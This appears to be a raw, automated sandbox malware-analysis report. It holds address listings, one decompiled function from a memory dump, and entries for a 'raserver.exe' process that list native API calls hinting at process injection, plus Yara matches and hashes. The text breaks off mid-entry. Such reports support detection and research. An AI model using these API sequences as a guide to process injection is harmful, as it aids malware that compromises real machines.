                                                                                                                                                      0x009ceeee
                                                                                                                                                      0x009ceef4
                                                                                                                                                      0x009ceef7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009ceef9
                                                                                                                                                      0x009ceeff
                                                                                                                                                      0x009cef04
                                                                                                                                                      0x009cef06
                                                                                                                                                      0x009cef06
                                                                                                                                                      0x009cef0d
                                                                                                                                                      0x009cef0f
                                                                                                                                                      0x009cef12
                                                                                                                                                      0x009cef17
                                                                                                                                                      0x009cef1b
                                                                                                                                                      0x009cef1f
                                                                                                                                                      0x009cef22
                                                                                                                                                      0x009cef27
                                                                                                                                                      0x009cef2a
                                                                                                                                                      0x009cef2c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cef2c
                                                                                                                                                      0x009ceee2
                                                                                                                                                      0x009cecba
                                                                                                                                                      0x009cecbd
                                                                                                                                                      0x009cecc3
                                                                                                                                                      0x009cecc6
                                                                                                                                                      0x009cecc9
                                                                                                                                                      0x009cecd2
                                                                                                                                                      0x009cecd5
                                                                                                                                                      0x009cece5
                                                                                                                                                      0x009cece8
                                                                                                                                                      0x009ceceb
                                                                                                                                                      0x009cecf3
                                                                                                                                                      0x009cecf9
                                                                                                                                                      0x009cecfc
                                                                                                                                                      0x009ced02
                                                                                                                                                      0x009ced0d
                                                                                                                                                      0x009ced23
                                                                                                                                                      0x009ced37
                                                                                                                                                      0x009ced40
                                                                                                                                                      0x009ced49
                                                                                                                                                      0x009ced52
                                                                                                                                                      0x009ced58
                                                                                                                                                      0x009ced5c
                                                                                                                                                      0x009ced67
                                                                                                                                                      0x009ced6d
                                                                                                                                                      0x009ced76
                                                                                                                                                      0x009ced7c
                                                                                                                                                      0x009ced82
                                                                                                                                                      0x009ced88
                                                                                                                                                      0x009ced92
                                                                                                                                                      0x009ced9b
                                                                                                                                                      0x009ceda7
                                                                                                                                                      0x009cedb3
                                                                                                                                                      0x009cedbf
                                                                                                                                                      0x009cedcb
                                                                                                                                                      0x009cedd2
                                                                                                                                                      0x009cedd9
                                                                                                                                                      0x009cede2
                                                                                                                                                      0x009cedf2
                                                                                                                                                      0x009cedf9
                                                                                                                                                      0x009cee14
                                                                                                                                                      0x009cee1c
                                                                                                                                                      0x009cee23
                                                                                                                                                      0x009cee28
                                                                                                                                                      0x009cee2f
                                                                                                                                                      0x009cee36
                                                                                                                                                      0x009cee3f
                                                                                                                                                      0x009cee48
                                                                                                                                                      0x009cee4e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cee4e
                                                                                                                                                      0x009cecd7
                                                                                                                                                      0x009cecd9
                                                                                                                                                      0x009cecd9
                                                                                                                                                      0x009cecdc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cecdc
                                                                                                                                                      0x009ceccb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009ceccb
                                                                                                                                                      0x009ceba0
                                                                                                                                                      0x009ceba4
                                                                                                                                                      0x009ceba5
                                                                                                                                                      0x009cebab
                                                                                                                                                      0x009cebac
                                                                                                                                                      0x009cebad
                                                                                                                                                      0x009cebae
                                                                                                                                                      0x009cebaf
                                                                                                                                                      0x009cebb3
                                                                                                                                                      0x009cebb6
                                                                                                                                                      0x009cebb9
                                                                                                                                                      0x009cebbe
                                                                                                                                                      0x009cebc1
                                                                                                                                                      0x009cebc3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cebcf
                                                                                                                                                      0x009cebd1
                                                                                                                                                      0x009cebd3
                                                                                                                                                      0x009cebe4
                                                                                                                                                      0x009cebea
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cebef
                                                                                                                                                      0x009cebf5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cebf7
                                                                                                                                                      0x009cebfe
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cec00
                                                                                                                                                      0x009cec03
                                                                                                                                                      0x009cec09
                                                                                                                                                      0x009cec11
                                                                                                                                                      0x009cec16
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cec1a
                                                                                                                                                      0x009cec1c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cec21
                                                                                                                                                      0x009cec21
                                                                                                                                                      0x009cec24
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cec26
                                                                                                                                                      0x009cec29
                                                                                                                                                      0x009cec2c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cec2e
                                                                                                                                                      0x009cec32
                                                                                                                                                      0x009cec33
                                                                                                                                                      0x009cec36
                                                                                                                                                      0x009cec39
                                                                                                                                                      0x009cec3f
                                                                                                                                                      0x009cec42
                                                                                                                                                      0x009cec43
                                                                                                                                                      0x009cec44
                                                                                                                                                      0x009cec45
                                                                                                                                                      0x009cec46
                                                                                                                                                      0x009cec4a
                                                                                                                                                      0x009cec4f
                                                                                                                                                      0x009cec56
                                                                                                                                                      0x009cec59
                                                                                                                                                      0x009cec5c
                                                                                                                                                      0x009cec62
                                                                                                                                                      0x009cec6b
                                                                                                                                                      0x009cec72
                                                                                                                                                      0x009cec78
                                                                                                                                                      0x009cec81
                                                                                                                                                      0x009cec87
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cec87
                                                                                                                                                      0x009cebd5
                                                                                                                                                      0x009cebd5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cebd5
                                                                                                                                                      0x009ceb5e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009ceb5e
                                                                                                                                                      0x009cea9a
                                                                                                                                                      0x009cea9b
                                                                                                                                                      0x009ceaa3
                                                                                                                                                      0x009ceaa5
                                                                                                                                                      0x009ceaac
                                                                                                                                                      0x009ceaaf
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009ceab5
                                                                                                                                                      0x009ceab6
                                                                                                                                                      0x009ceabe
                                                                                                                                                      0x009ceabf
                                                                                                                                                      0x009ceac2
                                                                                                                                                      0x009ceac9
                                                                                                                                                      0x009ceacc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cead2
                                                                                                                                                      0x009cead3
                                                                                                                                                      0x009cead8
                                                                                                                                                      0x009cead9
                                                                                                                                                      0x009ceadd
                                                                                                                                                      0x009ceae4
                                                                                                                                                      0x009ceae7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009ceaed
                                                                                                                                                      0x009ceaee
                                                                                                                                                      0x009ceaf6
                                                                                                                                                      0x009ceaf9
                                                                                                                                                      0x009ceb00
                                                                                                                                                      0x009ceb03
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009ceb0e
                                                                                                                                                      0x009ceb15
                                                                                                                                                      0x009ceb18
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009ceb22
                                                                                                                                                      0x009ceb26
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009CED1C
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009CED32
                                                                                                                                                        • Part of subcall function 0090F900: LdrInitializeThunk.NTDLL ref: 0090F90E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                      • String ID: athan
                                                                                                                                                      • API String ID: 1404860816-369431050
                                                                                                                                                      • Opcode ID: 9e2cc6addef524c309cc4af5253d67362ac08711b9c8f7f376d8fa5e594f3f82
                                                                                                                                                      • Instruction ID: df430a9aedf43e2686576f2117c0842302b29553c2768913a5a3835e38617c8d
                                                                                                                                                      • Opcode Fuzzy Hash: 9e2cc6addef524c309cc4af5253d67362ac08711b9c8f7f376d8fa5e594f3f82
                                                                                                                                                      • Instruction Fuzzy Hash: 2F022AB1900649AFDB55DF64C880FEABBF8FF08300F00856EE99AD7251D734A955CB61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 009CC371, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                      			E009CC371(void* __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8, short _a12) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v24;
				intOrPtr _t57;
				short _t58;
				intOrPtr _t61;
				signed char _t63;
				signed int _t65;
				signed int _t74;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t80;
				signed int _t82;
				intOrPtr _t87;
				signed int _t89;
				signed int _t90;
				intOrPtr* _t91;
				signed int _t93;
				signed int _t94;
				intOrPtr _t97;

				_t87 = __edx;
				_v16 = _v16 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t80 = _a8;
				_t57 =  *((intOrPtr*)(_t80 + 4));
				if(_t57 <= 0) {
					_t57 =  *((intOrPtr*)(_t80 + 8));
				}
				_t97 = _a4;
				 *((intOrPtr*)(_t80 + 0x30)) = _t57;
				_t89 =  *((intOrPtr*)(_t97 + 0x80));
				_t58 = _a12;
				_a8 = _t89;
				if(_t57 != 0x48 || _t58 == 1) {
					 *((short*)(_t80 + 0x34)) = _t58;
					 *((intOrPtr*)(_t80 + 0x10)) = E009CBCFC();
					 *((intOrPtr*)(_t80 + 0x14)) = _t87;
					__eflags =  *(_t97 + 0x5c);
					if( *(_t97 + 0x5c) == 0) {
						goto L25;
					}
					_t61 =  *((intOrPtr*)(_t80 + 0x30));
					__eflags = _t61 - _t89;
					if(_t61 < _t89) {
						_t78 = _t61 + _t80;
						__eflags = _t61 + _t80;
						E0091DFC0(_t78, 0xff, _t89 - _t61);
					}
					_t90 =  *(_t97 + 0xcc);
					_t63 = _t90 >> 3;
					__eflags = _t63 & 0x00000001;
					if((_t63 & 0x00000001) != 0) {
						_v16 = 2;
					}
					_t82 =  *(_t97 + 0xc8);
					__eflags = _t82;
					if(_t82 <= 0) {
						L18:
						_push(0);
						_t91 = _t97 + 0xf0;
						_push(_t91);
						_push(_a8);
						_push(_t80);
						_push( &_v24);
						_push(0);
						_push(0);
						_push(0);
						_t65 = E0090F938( *(_t97 + 0x5c));
						_v8 = _t65;
						__eflags = _t65;
						if(_t65 < 0) {
							__eflags = _t65 - 0x80000022;
							if(_t65 == 0x80000022) {
								goto L25;
							}
							__eflags = _v8 - 2;
							if(_v8 == 2) {
								goto L25;
							}
							goto L24;
						}
						 *_t91 =  *_t91 + _a8;
						asm("adc dword [edi+0x4], 0x0");
						 *((intOrPtr*)(_t97 + 0x100)) =  *((intOrPtr*)(_t97 + 0x100)) + 1;
						 *((intOrPtr*)(_t97 + 0xd8)) =  *((intOrPtr*)(_t97 + 0xd8)) + 1;
						goto L25;
					} else {
						asm("sbb eax, eax");
						asm("cdq");
						_v12 = E0093F1E0(( ~(_t90 & 0x00002000) & 0xfff00400) + 0x100000, _t87, _t82, 0);
						_t74 =  *((intOrPtr*)(_t97 + 0xd8)) + _v16;
						_t75 = _t74 * _a8;
						__eflags = _t74 * _a8 >> 0x20 - _t87;
						if(__eflags < 0) {
							goto L18;
						}
						if(__eflags > 0) {
							L14:
							_t93 = (_t90 & 0x0000000b) - 1;
							__eflags = _t93;
							if(_t93 == 0) {
								_v8 = 0xc0000188;
								L24:
								_t54 = _t97 + 0xfc;
								 *_t54 =  *(_t97 + 0xfc) + 1;
								__eflags =  *_t54;
								goto L25;
							}
							_t94 = _t93 - 1;
							__eflags = _t94;
							if(_t94 == 0) {
								_t76 = _t97 + 0xe8;
								 *((intOrPtr*)(_t97 + 0xf0)) =  *_t76;
								_t86 =  *((intOrPtr*)(_t76 + 4));
								 *((intOrPtr*)(_t97 + 0xf4)) =  *((intOrPtr*)(_t76 + 4));
								 *((intOrPtr*)(_t97 + 0xd8)) = E00954FC0( *_t76, _t86,  *((intOrPtr*)(_t97 + 0x80)), 0);
							} else {
								__eflags = _t94 == 6;
								if(_t94 == 6) {
									_t34 = _t97 + 0xd4;
									 *_t34 =  *(_t97 + 0xd4) | 0x00000001;
									__eflags =  *_t34;
								}
							}
							goto L18;
						}
						__eflags = _t75 - _v12;
						if(_t75 < _v12) {
							goto L18;
						}
						goto L14;
					}
				} else {
					_v8 = 0x80000022;
					L25:
					return _v8;
				}
			}
























                                                                                                                                                      0x009cc371
                                                                                                                                                      0x009cc379
                                                                                                                                                      0x009cc37d
                                                                                                                                                      0x009cc382
                                                                                                                                                      0x009cc385
                                                                                                                                                      0x009cc38c
                                                                                                                                                      0x009cc38e
                                                                                                                                                      0x009cc38e
                                                                                                                                                      0x009cc391
                                                                                                                                                      0x009cc394
                                                                                                                                                      0x009cc397
                                                                                                                                                      0x009cc3a0
                                                                                                                                                      0x009cc3a4
                                                                                                                                                      0x009cc3a7
                                                                                                                                                      0x009cc3bb
                                                                                                                                                      0x009cc3c4
                                                                                                                                                      0x009cc3c7
                                                                                                                                                      0x009cc3ca
                                                                                                                                                      0x009cc3ce
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cc3d4
                                                                                                                                                      0x009cc3d7
                                                                                                                                                      0x009cc3d9
                                                                                                                                                      0x009cc3de
                                                                                                                                                      0x009cc3de
                                                                                                                                                      0x009cc3e6
                                                                                                                                                      0x009cc3eb
                                                                                                                                                      0x009cc3ee
                                                                                                                                                      0x009cc3f6
                                                                                                                                                      0x009cc3f9
                                                                                                                                                      0x009cc3fb
                                                                                                                                                      0x009cc3fd
                                                                                                                                                      0x009cc3fd
                                                                                                                                                      0x009cc404
                                                                                                                                                      0x009cc40a
                                                                                                                                                      0x009cc40c
                                                                                                                                                      0x009cc45f
                                                                                                                                                      0x009cc461
                                                                                                                                                      0x009cc462
                                                                                                                                                      0x009cc468
                                                                                                                                                      0x009cc469
                                                                                                                                                      0x009cc46f
                                                                                                                                                      0x009cc470
                                                                                                                                                      0x009cc471
                                                                                                                                                      0x009cc472
                                                                                                                                                      0x009cc473
                                                                                                                                                      0x009cc477
                                                                                                                                                      0x009cc47c
                                                                                                                                                      0x009cc47f
                                                                                                                                                      0x009cc481
                                                                                                                                                      0x009cc4d2
                                                                                                                                                      0x009cc4d7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cc4d9
                                                                                                                                                      0x009cc4dd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cc4dd
                                                                                                                                                      0x009cc486
                                                                                                                                                      0x009cc488
                                                                                                                                                      0x009cc48c
                                                                                                                                                      0x009cc492
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cc40e
                                                                                                                                                      0x009cc417
                                                                                                                                                      0x009cc425
                                                                                                                                                      0x009cc42e
                                                                                                                                                      0x009cc437
                                                                                                                                                      0x009cc43c
                                                                                                                                                      0x009cc43f
                                                                                                                                                      0x009cc441
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cc443
                                                                                                                                                      0x009cc44a
                                                                                                                                                      0x009cc44d
                                                                                                                                                      0x009cc44d
                                                                                                                                                      0x009cc44e
                                                                                                                                                      0x009cc4c9
                                                                                                                                                      0x009cc4df
                                                                                                                                                      0x009cc4df
                                                                                                                                                      0x009cc4df
                                                                                                                                                      0x009cc4df
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cc4df
                                                                                                                                                      0x009cc450
                                                                                                                                                      0x009cc450
                                                                                                                                                      0x009cc451
                                                                                                                                                      0x009cc49a
                                                                                                                                                      0x009cc4aa
                                                                                                                                                      0x009cc4b0
                                                                                                                                                      0x009cc4b6
                                                                                                                                                      0x009cc4c1
                                                                                                                                                      0x009cc453
                                                                                                                                                      0x009cc453
                                                                                                                                                      0x009cc456
                                                                                                                                                      0x009cc458
                                                                                                                                                      0x009cc458
                                                                                                                                                      0x009cc458
                                                                                                                                                      0x009cc458
                                                                                                                                                      0x009cc456
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cc451
                                                                                                                                                      0x009cc445
                                                                                                                                                      0x009cc448
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cc448
                                                                                                                                                      0x009cc3af
                                                                                                                                                      0x009cc3af
                                                                                                                                                      0x009cc4e5
                                                                                                                                                      0x009cc4ec
                                                                                                                                                      0x009cc4ec

                                                                                                                                                      APIs
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009CC4BC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                      • String ID: "$athan
                                                                                                                                                      • API String ID: 885266447-2304005628
                                                                                                                                                      • Opcode ID: 21b0ad0dda1a5bf92bd42300e84133f5eed5dd667f43441593c7c56666070728
                                                                                                                                                      • Instruction ID: 03bf6c742900234f6e4d0b864925580b806423172824f140fa16395e5c326d89
                                                                                                                                                      • Opcode Fuzzy Hash: 21b0ad0dda1a5bf92bd42300e84133f5eed5dd667f43441593c7c56666070728
                                                                                                                                                      • Instruction Fuzzy Hash: E1419CB1A00605AFDB28DF68C895FBABBB9FB44304F14C82DE85ADB251D734E940CB11
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Analysis Process: raserver.exe PID: 3024 Parent PID: 1388 raserver.exeCOMMON

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 01E69862, Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 478nativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtQueryInformationProcess.NTDLL ref: 01E699BF
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378587189.0000000001E60000.00000040.00000001.sdmp, Offset: 01E60000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InformationProcessQuery
                                                                                                                                                      • String ID: 0
                                                                                                                                                      • API String ID: 1778838933-4108050209
                                                                                                                                                      • Opcode ID: 39eb83527b9dfb0958a03f1802a1a4be67d21b07a2af987d97fec1c560f0ff77
                                                                                                                                                      • Instruction ID: c85d515c69da10ae82627d231b88aad73f2c67c1ac48ca427b07c7ba1d004072
                                                                                                                                                      • Opcode Fuzzy Hash: 39eb83527b9dfb0958a03f1802a1a4be67d21b07a2af987d97fec1c560f0ff77
                                                                                                                                                      • Instruction Fuzzy Hash: 46F16070658A8D8FDB69EF68CC94AEEB7E4FBA8304F80562AD44EC7250DF349541CB41
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01E693CE, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227nativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378587189.0000000001E60000.00000040.00000001.sdmp, Offset: 01E60000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Section$CloseCreateView
                                                                                                                                                      • String ID: @$@
                                                                                                                                                      • API String ID: 1133238012-149943524
                                                                                                                                                      • Opcode ID: 2dd0556cb7a3a44c3eaa392cada0241847c7aae05cd783fd05879651b916d73c
                                                                                                                                                      • Instruction ID: b1deeb005a5f835918bf70e9f67da9e5b0cf4c53e3d4414b4c4686b14fb5ac0a
                                                                                                                                                      • Opcode Fuzzy Hash: 2dd0556cb7a3a44c3eaa392cada0241847c7aae05cd783fd05879651b916d73c
                                                                                                                                                      • Instruction Fuzzy Hash: 0A61A270618B498FCB58DF68D8856AEBBE0FF98354F50062EE58AC3251DF35D441CB86
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01E693D2, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378587189.0000000001E60000.00000040.00000001.sdmp, Offset: 01E60000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Section$CreateView
                                                                                                                                                      • String ID: @$@
                                                                                                                                                      • API String ID: 1585966358-149943524
                                                                                                                                                      • Opcode ID: 82cb147daf14df8b0d9c936528d241d68235823296eaefc453e7a0fe9bd717e9
                                                                                                                                                      • Instruction ID: f824d7a9afd9ff90d7f738df0856a3f7ec950e3906b81350c41a3335d387a956
                                                                                                                                                      • Opcode Fuzzy Hash: 82cb147daf14df8b0d9c936528d241d68235823296eaefc453e7a0fe9bd717e9
                                                                                                                                                      • Instruction Fuzzy Hash: 3C518E70618B098FC758DF18D895AAEBBE4FB98344F50062EE98AC3251DF35D581CB86
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00139D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00134B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00134B77,007A002E,00000000,00000060,00000000,00000000), ref: 00139D9D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                      • Instruction ID: c2695d36a07e3dac24dd742e60170a3065d012237968673667184f85daaeeb15
                                                                                                                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                      • Instruction Fuzzy Hash: A3F0B2B2200208AFCB08CF88DC95EEB77ADAF8C754F158248BA5D97241C630E8118BA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00139D4B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38filenativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00134B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00134B77,007A002E,00000000,00000060,00000000,00000000), ref: 00139D9D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                                                      • Opcode ID: c5eada3fde6041dd41a8304a6df54e10c95515091d94004dfce0eb1109ed1a57
                                                                                                                                                      • Instruction ID: 869e384ed573a00bc37e9dbe5d1a976b741f1bdd6ae7504b1e6801f85e76a322
                                                                                                                                                      • Opcode Fuzzy Hash: c5eada3fde6041dd41a8304a6df54e10c95515091d94004dfce0eb1109ed1a57
                                                                                                                                                      • Instruction Fuzzy Hash: 5FF0B6B2204149ABCB08DF98DD85CDBB7ADBF8C354B05864CFA5D93201D630E8518BA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00139DA4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35filenativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00134B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00134B77,007A002E,00000000,00000060,00000000,00000000), ref: 00139D9D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 823142352-1441809116
                                                                                                                                                      • Opcode ID: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                                                                                                                                                      • Instruction ID: 6337283eb65c4101f9a0ee3fd8d1c36fb4deb8b8eadcac0e0c19859b5995b288
                                                                                                                                                      • Opcode Fuzzy Hash: 0df0540dcfb7a93cfac3ea25ea307f49f1dc3bbb10a73f40ff662512db58c0a8
                                                                                                                                                      • Instruction Fuzzy Hash: 00F06CB2214109AF8B48DF98D890DEB73F9BF8C354B159648FA4D93201D631E851CBA4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 01E69DAE, Relevance: 1.6, APIs: 1, Instructions: 76nativethreadCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378587189.0000000001E60000.00000040.00000001.sdmp, Offset: 01E60000, based on PE: false
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                      • Opcode ID: 7b4da7a0d455cc38696462cd40052f2bf395cdaf7ac6e97e0619bd9c66e01c65
                                                                                                                                                      • Instruction ID: e1bdec0eebf47511bf583c1177f7eaf3db6b690d6ddc134603bf05169a8a90c4
                                                                                                                                                      • Opcode Fuzzy Hash: 7b4da7a0d455cc38696462cd40052f2bf395cdaf7ac6e97e0619bd9c66e01c65
                                                                                                                                                      • Instruction Fuzzy Hash: 1F21AE30A14A498FDB64EF68C8887AEB7E4FF98358F40152AE50DC7251DB749981C781
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00139E00, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • NtReadFile.NTDLL(00134D32,5EB6522D,FFFFFFFF,001349F1,?,?,00134D32,?,001349F1,FFFFFFFF,5EB6522D,00134D32,?,00000000), ref: 00139E45
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2378175616.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                      • Instruction ID: 70b658380ec60f4aa789d4b04bceed0980b547b4f65c7bbde62b76fb38720e03
